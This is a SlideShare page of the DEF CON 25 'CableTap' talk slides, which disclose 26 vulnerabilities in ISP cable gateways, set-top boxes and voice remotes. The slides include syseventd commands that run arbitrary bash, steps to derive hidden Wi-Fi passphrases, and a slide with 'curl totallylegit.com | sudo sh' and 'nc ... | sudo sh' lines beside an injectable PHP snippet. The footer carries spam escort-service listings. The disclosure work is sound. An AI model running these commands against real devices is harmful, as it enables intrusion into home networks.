SlideShare a Scribd company logo

CableTap - Wirelessly Tapping Your Home Network

Download as PPTX, PDF
Christopher Grayson
Christopher Grayson

These are the slides from Marc Newlin, Logan Lamb, and Christopher Grayson's DEF CON 25 talk "CableTap - Wirelessly Tapping Your Home Network."

Internet
1 of 61
Cabletap Wirelessly Tapping your home network MARC NEWLIN @MARCNEWLI N LOGAN LAMB LOGAN@BASTILLE .IO CHRIS GRAYSON @_LAVALAMP
WELCOME TO THE LINECON AFTER-PARTY.
MARC NEWLIN (@marcnewlin)W I R E L E S S S E C U R I T Y R E S E A R C H E R @ B A S T I L L E N E T W O R K S
CHRISTOPHER GRAYSON (@_lavalamp)F O U N D E R / P R I N C I P A L E N G I N E E R @ W E B S I G H T
LOGAN LAMB (logan@bastille.io) R E S E A R C H E R @ B A S T I L L E N E T W O R K S
• 26 CVEs • ISP-provided wireless gateways, set-top boxes, and voice remotes • Cisco, Arris, Technicolor, Motorola, Xfinity (voice remote) • Multiple unauthenticated RCE attack chains • Network / application vulnerabilities • Wi-Fi vulnerabilities • ZigBee RF4CE vulnerabilities What is CableTap?
• Full compromise of affected devices • Wide impact • ISP vulnerabilities • Vendor vulnerabilities • RDK vulnerabilities (software stack used by many major ISPs) • Attack chains affecting Comcast XFINITY devices have been patched Why does CableTap matter?
AGENDA 1. Background on RDK 2. RDK-based devices 3. Progression of research 4. Vulnerabilities 5. Disclosure process 6. Q&A
Background on RDK.
REFERENCE DEVELOPMENT KIT (RDK) • “a standardized software stack with localization plugins created to accelerate the deployment of next- gen video products and services by multichannel video providers (MVPDs).” • Founded in 2012 • Standardized software stack for modems, set top boxes, media devices https://rdkcentral.com/ C
An open-source, community- driven project available at: https://code.rdkcentral.com/ But wait what’s this WHOIS record? Ohhhh that sinking feeling in the pit of my stomach… YAY OPEN SOURCE (?) SOFTWARE!
• There’s the open source version, then there’s the versions deployed on deployed devices • Lots of vulns patched in the open source repo • Patches take months to deploy, no CVEs filed for, no disclosure to affected customers • Still faster to deploy patches with RDK than non- standardized “native” stacks • RCE, XSS, XSRF, you name it they got it YEAH BUT WHO NEEDS PATCHES ANYHOO
RDK-Based Devices L
RDK DEVICES ● RDK-V (Video) ○ set-top boxes ● RDK-B (Broadband) ○ gateways
GENERAL RDK FEATURES Remote Management Subsystem Diagnostics Security Subsystem Media Framework
• Embedded Linux • Lots of IO • AV/Ethernet/Coax/USB/eSata • Media Framework uses Webkit • Supports keyboard and mouse • More pictures: https://fccid.io/ACQ- XG1
RDK-BROADBAND (GATEWAY) Router (Application Processor) Gateway Modem (Network Processor)
RDK-BROADBAND • Two systems on one board • Inter-processor communication over a switch • Intel Puma • Network Processor - ARM core • Application Processor - Intel Atom • Generally has two serial ports active Annotated dpc3939 internals here
Progression of Research M
MARC LEARNS TO NETCAT Project inspiration (Peter Geissler’s talk @ HITB) Connecting with Chris Prior Comcast customer (Marc’s ISP) “Beyond your cable modem” 32C3 talk “How do I webapp security plz?” Pulling off the filesystem using the previously disclosed web UI ping vuln Digging into the RDK repos M
GETTING SERIOUS Finding some vulns and getting serious Bringing the side project to Bastille Bringing Logan into the fold Hardware and embedded hacking expertise Expanding to set-top boxes Disclosing to vendors as new vulnerabilities are found M
Vulnerabilities M
VULNS - HIDDEN HOME SECURITY WIFI Home security service offered by many ISPs Touchscreen control panel connects over WiFi Hidden WiFi network runs on the customer’s gateway SSID and passphrase generated based on the CM MAC Hidden WiFi network, previously documented online Web UI access point index “hack” XHS-XXXXXXXX SSID format, based on CM MAC Grepping around for “calculate” “generate” “key” “psk” etc M
VULNS - HIDDEN HOME SECURITY WIFI CalculatePSKKey in <some binary> Cross compiling for big-endian ARM and running a keygen binary on the gateway Guesswork yielding the CM MAC input and PSK key output Command line binary observed on some devices How to get the CM MAC?? M
VULNS - DHCP ACK CM MAC LEAK 1. Connect to “xfinitywifi” network 2. CM MAC of the wireless gateway is included in the DHCP ACK 3. Generate hidden home security network SSID and passphrase M
VULNS - IPV6 MULTICAST CM MAC LEAK 1. Sniff the 802.11 channel used by the target wireless gateway 2. Every ~4 seconds, a 156-byte IPv6 multicast packet is transmitted with the l2sd0.500 interface MAC address 3. Translate the l2sd0.500 MAC to the CM MAC 4. Generate hidden home security network SSID and passphrase 11:22:33:44:55:66 - l2sd0.500 0F:22:33:44:55:63 - CM MAC M
FQDN: m001122334455.atlt6.ga.comcast.net CM MAC: 00:11:22:33:44:53 <-- last octet decreased by 2 1.mta0 (VoIP) interface has FQDN containing the mta0 MAC 2.Translate the mta0 MAC into the CM MAC 3.Generate hidden home security network SSID and passphrase VULNS - eMTA FQDN CM MAC LEAK
VULNS - IPV6 ADDRESSING FROM CM MACS Global IPv6 Link-local IPv6 Given the following inputs: Region identifier: 40:11 (Atlanta) Unknown octet: 53 (can be brute forced) MAC address: 11:22:33:44:55:66 The following wan0 IPv6 address is generated: 2001:0558:4011:0053:1122:33FF:FE44:5566 M
COMCAST VS PUBLIC INTERNET DEVICE ACCESS Web UI supports MSO login from WAN only SSH service from WAN only Internet-facing network configuration appears well locked-down M
XFINITY SEND-TO-TV Xifinity customer signs in with their account credentials Web app accepts URL Set-top box displays URL in a web browser M
VULNS - XFINITY SEND-TO-TV / REMOTE WEB UI Gateway web UI accepts remote requests from Comcast infrastructure MSO login using the POTD Alternative hard-coded credentials IPv6 address of target gateway provides remote web UI access via set-top box
Vulns - POTD “Password of the day” can be generated on a wireless gateway Used for remote web UI authentication Used for remote SSH authentication M
VULNS - FREE INTERNET • Public wifi access points run by ISPs • e.g. “CableWiFi”, “xfinitywifi”, etc • AP’s are on customer equipment or ISP equipment • Customer logs into their ISP account to get access M • MAC address is remembered for future access • Attacker can spoof the MAC • Free Internet on other public access points • “xfinitywifi” usage does not count toward a customer’s
M SEND-TO-TV ATTACK DEMO
IT’S LIKE CGI, BUT FAST & W/ EXPLOITS • FastCGI – successor to the Common Gateway Interface (CGI) protocol • Authored in 1996 • Enables web servers to invoke other processes – birth of dynamic generation of web content • No RFC, only documentation from MIT .edu site • Responder, Authorizer, and Filter modes of operation C
• PHP + FastCGI – what could possibly go wrong?! • Lets you reconfigure PHP settings on every request • HTTP POST data supplied via STDIN FastCGI parameter • If only there were abusable PHP configuration values… PHP FASTCGI PROCESS MANAGER (PHP- FPM)
PIECING THINGS TOGETHER • We can… • Reconfigure the PHP interpreter to include an arbitrary file • Supply data to STDIN via HTTP POST • But how do we include STDIN? • PHP TO THE RESCUE! • php://stdin
ISN’T THIS OLD NEWS? • Yes… Kind of (CVE-2012-1823) • Previous work was on exploiting the PHP- CGI binary residing within a web directory • But what if the PHP-CGI binary is bound to a network port? • Nmap sees as tcpwrapped (TCP 1026- 1029) • Scripts for detection included in CableTap code repo 37,449PHPFPM servers on port 1026 (IPv4 address space) C
A TWIST IN RDK’S PHPFPM • PHPFPM on the RDK deployments we tested had the PHP configuration component stripped out • No publicly-available documentation as to how to do this – why was it removed? • Could still gain code execution by referencing PHP files on the system and bypassing control flow guards in the default web app C
SYSEVENTD – RCE AS A SERVICE (RAAS) • Binary protocol listener on TCP 52,367 (all interfaces) • Not the same as Oracle syseventd! • Intended for firing off commands based on system events (logging??) • No auth, no nothing! C
SYSEVENTD USAGE 1. Create an event with a name and a binary to call upon event occurrence (name must be a file path) 1. Trigger the event by touching the event name file path and providing an argument 1. Binary is called with event name and arguments passed to command via execv $ sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp $ sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file> $ /bin/cp </path/to/file> /var/IGD/</file> C
SYSEVENTD (AB)USAGE /bin/cp /foo/bbhm_cur_cfg.xml /bar/baz/bbhm_cur_cfg.xml /bin/bash –c “<commands to execute>” • Create an event with a target process of /bin/bash and an event name of -c • Trigger the event with a value of the bash command to run • ??? • Profit C
WHERE THE SYSEVENTD AT?! • Bound to all interfaces • Sometimes not firewalled off from public-facing IP address • Otherwise exposed to plenty of the LAN IPs 149,162Syseventd services on TCP 52,367 (IPv4 address space) C
A TALE OF TWO OPERATING SYSTEMS • Two operating systems on the board • One ARM (modem w/ web app) and one Atom (router) • Modem is at bottom of range (10.0.0.1) and Atom is at top of range (10.0.0.254) C
I MAKE MY OWN ROUTES DAMMIT • Atom OS has an interface allocated in 169.254.0.0/16 range for Dbus • …You can route to it if you’re into that sort of thing • Custom RPC service that is quite literally RCE as service, and all that FastCGI goodness • Once on Atom side, hardcoded root SSH creds to ARM side on 192.168.0.0/16 ip route add 169.254.0.1 via 10.0.0.254 C
SET-TOP BOX VULNS Remote web inspector Arbitrary file read Root command execution RF4CE remote force pairing RF4CE remote force OTA L
REMOTE WEB INSPECTOR Comparable to FireFox and Chrome DevTools, accessible from over the internet L
ARBITRARY FILE READ ● Found a route that looked like it was for reading files from the filesystem ● The route is for reading files from the filesystem L
ROOT COMMAND EXECUTION Sanitize your inputs!!! Sanitize your inputs!!! Sanitize your inputs!!! sudo make install curl http://totallylegit.com | sudo sh nc -l -p 8080 0.0.0.0 | sudo sh <?php $name = $_POST["name"]; shell_exec("echo hello $name"); ?>
VOICE REMOTE OVERVIEW Control your STB with your voice! Wireless instead of IR! Motion activated lights! TI CC2530 with RF4CE stack
RF4CE OVERVIEW Zigbee protocol for remote control Key exchange is unencrypted
RF4CE MSO (OPENCABLE) OVERVIEW Uses RF4CE For remote control of cable equipment Binding process is not rate limited
RF4CE REMOTE FORCED PAIRING Emulate remote Entire binding process in under one second ~2 hours to force pair remote L
RF4CE REMOTE FORCED OTA Firmware package ISN’T signed 1)Modify update daemon 2)Modify firmware payload 3)Fix CRC and version 4)OTA :) L
Devices & Disclosure M
KNOWN AFFECTED DEVICES Vendor Model Type Tested ISP CVE Count Cisco DPC3939 Wireless Gateway Xfinity 16 Cisco DPC3939B Wireless Gateway Comcast Business 13 Technicolor DPC3941T Wireless Gateway Xfinity 11 Arris TG1682G Wireless Gateway Xfinity 12 Technicolor TC8717T* Wireless Gateway Time Warner 1 Motorola MX011ANM Set-Top Box Xfinity 6 Xfinity XR11-20 ZigBee Voice Remote Xfinity 1 M
KNOWN NON-RDK DEVICES Vendor Model Type Tested ISP Arris TG1682G Wireless Gateway Spectrum Technicolor TC8717T Wireless Gateway Mediacom Technicolor TC8717T Wireless Gateway Time Warner Arris TG2492LG-VM Wireless Gateway (Super Hub 3.0) Virgin Media Compal CH7465LG-LC Wireless Gateway (Connect Box) Unitymedia Technicolor TC8305C Wireless Gateway Xfinity Arris TG1682G Wireless Gateway Cox M
DISCLOSURE TIMELINE 03/27/2017 Group 1 Vendor Disclosures 03/28/2017 Group 2 Vendor Disclosures 04/20/2017 Group 3 Vendor Disclosures 04/28/2017 Group 4 Vendor Disclosures 07/11/2017 Abstract goes live on defcon.org 07/28/2018 Public Disclosure (all groups) M
REMEDIATION AND MITIGATION Unauthenticated RCE attack chains affecting Comcast XFINITY devices have been remediated Customers of other ISPs should contact their ISP to determine if their hardware is affected by CableTap M
FINAL REMARKS Not enough time to talk about all of the vulnerabilities Please see our whitepaper for further details <link to whitepaper> We found a substantial number of vulns, but the most severe have been patched (hooray!) M
Q&A Thank you for watching our talk :) Thanks to Bastille for supporting our research. Thanks to Comcast for remediating the unauthenticated RCE attack chains affecting Xfinity-branded devices. MARC NEWLIN Bastille Networks marc@bastille.io @marcnewlin LOGAN LAMB Bastille Networks logan@bastille.io CHRIS GRAYSON Web Sight chris@websight.io @_lavalamp

Recommended

You, and Me, and Docker Makes Three
You, and Me, and Docker Makes ThreeYou, and Me, and Docker Makes Three
You, and Me, and Docker Makes Three
Christopher Grayson
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big Data
Christopher Grayson
 
Grey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache PoisoningGrey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache Poisoning
Christopher Grayson
 
Started In Security Now I'm Here
Started In Security Now I'm HereStarted In Security Now I'm Here
Started In Security Now I'm Here
Christopher Grayson
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Scott Sutherland
 
Fun With SHA2 Certificates
Fun With SHA2 CertificatesFun With SHA2 Certificates
Fun With SHA2 Certificates
Gabriella Davis
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Hot potato Privilege Escalation
Hot potato Privilege EscalationHot potato Privilege Escalation
Hot potato Privilege Escalation
Sunny Neo
 

Recommended

You, and Me, and Docker Makes Three
You, and Me, and Docker Makes ThreeYou, and Me, and Docker Makes Three
You, and Me, and Docker Makes Three
Christopher Grayson
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big Data
Christopher Grayson
 
Grey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache PoisoningGrey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache Poisoning
Christopher Grayson
 
Started In Security Now I'm Here
Started In Security Now I'm HereStarted In Security Now I'm Here
Started In Security Now I'm Here
Christopher Grayson
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Scott Sutherland
 
Fun With SHA2 Certificates
Fun With SHA2 CertificatesFun With SHA2 Certificates
Fun With SHA2 Certificates
Gabriella Davis
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Hot potato Privilege Escalation
Hot potato Privilege EscalationHot potato Privilege Escalation
Hot potato Privilege Escalation
Sunny Neo
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Scott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
Scott Sutherland
 
1000 to 0
1000 to 01000 to 0
1000 to 0
Sunny Neo
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Oram And Secure Computation
Oram And Secure ComputationOram And Secure Computation
Oram And Secure Computation
Chong-Kuan Chen
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
Gabriella Davis
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
Shakacon
 
Global Software Development powered by Perforce
Global Software Development powered by PerforceGlobal Software Development powered by Perforce
Global Software Development powered by Perforce
Perforce
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
Ronan Dunne, CEH, SSCP
 
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Docker, Inc.
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Shakacon
 
Continuous Security in DevOps
Continuous Security in DevOpsContinuous Security in DevOps
Continuous Security in DevOps
Maciej Lasyk
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
EnclaveSecurity
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
Royce Davis
 
FreeSWITCH on Docker
FreeSWITCH on DockerFreeSWITCH on Docker
FreeSWITCH on Docker
Chien Cheng Wu
 
FreeSWITCH on Docker
FreeSWITCH on DockerFreeSWITCH on Docker
FreeSWITCH on Docker
建澄 吳
 

More Related Content

What's hot

Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Scott Sutherland
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
Gabriella Davis
 
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Docker, Inc.
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Shakacon
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
EnclaveSecurity
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 

What's hot (20)

Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Oram And Secure Computation
Oram And Secure ComputationOram And Secure Computation
Oram And Secure Computation
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
Global Software Development powered by Perforce
Global Software Development powered by PerforceGlobal Software Development powered by Perforce
Global Software Development powered by Perforce
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
 
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
Sharding Containers: Make Go Apps Computer-Friendly Again by Andrey Sibiryov
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
 
Continuous Security in DevOps
Continuous Security in DevOpsContinuous Security in DevOps
Continuous Security in DevOps
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 

Similar to CableTap - Wirelessly Tapping Your Home Network

Creating Your Virtual Data Center: VPC Fundamentals
Creating Your Virtual Data Center: VPC FundamentalsCreating Your Virtual Data Center: VPC Fundamentals
Creating Your Virtual Data Center: VPC Fundamentals
Amazon Web Services
 
7256 ccna security_chapter_8_vpn_dl3_oz_20130409031455
7256 ccna security_chapter_8_vpn_dl3_oz_201304090314557256 ccna security_chapter_8_vpn_dl3_oz_20130409031455
7256 ccna security_chapter_8_vpn_dl3_oz_20130409031455
ytrui
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
Aleksandr Timorin
 
PLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWS
PLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWSPLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWS
PLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWS
PROIDEA
 
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity Options
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity OptionsCreating Your Virtual Data Center: VPC Fundamentals and Connectivity Options
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity Options
Amazon Web Services
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminsky
Dan Kaminsky
 

Similar to CableTap - Wirelessly Tapping Your Home Network (20)

FreeSWITCH on Docker
FreeSWITCH on DockerFreeSWITCH on Docker
FreeSWITCH on Docker
 
FreeSWITCH on Docker
FreeSWITCH on DockerFreeSWITCH on Docker
FreeSWITCH on Docker
 
The FRAFOS ABC SBC WebRTC gateway
The FRAFOS ABC SBC WebRTC gateway The FRAFOS ABC SBC WebRTC gateway
The FRAFOS ABC SBC WebRTC gateway
 
Creating Your Virtual Data Center: VPC Fundamentals
Creating Your Virtual Data Center: VPC FundamentalsCreating Your Virtual Data Center: VPC Fundamentals
Creating Your Virtual Data Center: VPC Fundamentals
 
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
 
7256 ccna security_chapter_8_vpn_dl3_oz_20130409031455
7256 ccna security_chapter_8_vpn_dl3_oz_201304090314557256 ccna security_chapter_8_vpn_dl3_oz_20130409031455
7256 ccna security_chapter_8_vpn_dl3_oz_20130409031455
 
Creating Your Virtual Data Center
Creating Your Virtual Data CenterCreating Your Virtual Data Center
Creating Your Virtual Data Center
 
Design and Deployment of Enterprise WLANs
Design and Deployment of Enterprise WLANsDesign and Deployment of Enterprise WLANs
Design and Deployment of Enterprise WLANs
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
 
PLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWS
PLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWSPLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWS
PLNOG 17 - Tomasz Stachlewski - Infrastruktura sieciowa w chmurze AWS
 
Easily emulating full systems on amazon fpg as
Easily emulating full systems on amazon fpg asEasily emulating full systems on amazon fpg as
Easily emulating full systems on amazon fpg as
 
Simple hybrid voice deployments with Sonus
Simple hybrid voice deployments with SonusSimple hybrid voice deployments with Sonus
Simple hybrid voice deployments with Sonus
 
Simple hybrid voice deployments with Sonus
Simple hybrid voice deployments with SonusSimple hybrid voice deployments with Sonus
Simple hybrid voice deployments with Sonus
 
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity Options
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity OptionsCreating Your Virtual Data Center: VPC Fundamentals and Connectivity Options
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity Options
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminsky
 
Schneider-Electric & NextNine – Comparing Remote Connectivity Solutions
Schneider-Electric & NextNine – Comparing Remote Connectivity SolutionsSchneider-Electric & NextNine – Comparing Remote Connectivity Solutions
Schneider-Electric & NextNine – Comparing Remote Connectivity Solutions
 
Integration and Interoperation of existing Nexus networks into an ACI Archite...
Integration and Interoperation of existing Nexus networks into an ACI Archite...Integration and Interoperation of existing Nexus networks into an ACI Archite...
Integration and Interoperation of existing Nexus networks into an ACI Archite...
 
API 102: Programming with Meraki APIs
API 102: Programming with Meraki APIsAPI 102: Programming with Meraki APIs
API 102: Programming with Meraki APIs
 
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
 
SCADA deep inside: protocols and security mechanisms
SCADA deep inside: protocols and security mechanismsSCADA deep inside: protocols and security mechanisms
SCADA deep inside: protocols and security mechanisms
 

More from Christopher Grayson

More from Christopher Grayson (7)

Addressing Security Regression Through Unit Testing
Addressing Security Regression Through Unit TestingAddressing Security Regression Through Unit Testing
Addressing Security Regression Through Unit Testing
 
Security Compensation - How to Invest in Start-Up Security
Security Compensation - How to Invest in Start-Up SecuritySecurity Compensation - How to Invest in Start-Up Security
Security Compensation - How to Invest in Start-Up Security
 
So You Want to be a Hacker?
So You Want to be a Hacker?So You Want to be a Hacker?
So You Want to be a Hacker?
 
Introduction to LavaPasswordFactory
Introduction to LavaPasswordFactoryIntroduction to LavaPasswordFactory
Introduction to LavaPasswordFactory
 
Root the Box - An Open Source Platform for CTF Administration
Root the Box - An Open Source Platform for CTF AdministrationRoot the Box - An Open Source Platform for CTF Administration
Root the Box - An Open Source Platform for CTF Administration
 
Grey H@t - Academic Year 2012-2013 Recap
Grey H@t - Academic Year 2012-2013 RecapGrey H@t - Academic Year 2012-2013 Recap
Grey H@t - Academic Year 2012-2013 Recap
 
Grey H@t - Cross-site Request Forgery
Grey H@t - Cross-site Request ForgeryGrey H@t - Cross-site Request Forgery
Grey H@t - Cross-site Request Forgery
 

Recently uploaded

valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
soniya singh
 
